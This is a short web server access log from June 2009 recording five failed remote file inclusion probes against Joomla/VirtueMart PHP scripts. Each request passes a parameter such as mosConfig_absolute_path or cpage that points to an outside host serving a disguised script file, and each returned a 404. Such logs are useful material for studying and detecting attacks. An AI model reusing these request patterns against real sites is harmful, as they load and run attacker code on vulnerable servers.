66.249.134.74 - - [20/Jun/2009:00:17:57 -0400] "GET /logs/access_log.Q109051300//com_virtuemart/export.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.217.216.86 - - [20/Jun/2009:00:18:11 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 213 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:00:18:11 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:00:18:11 -0400] "GET //index.php?option=com_custompages&cpage=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.122.142.249 - - [20/Jun/2009:00:18:18 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
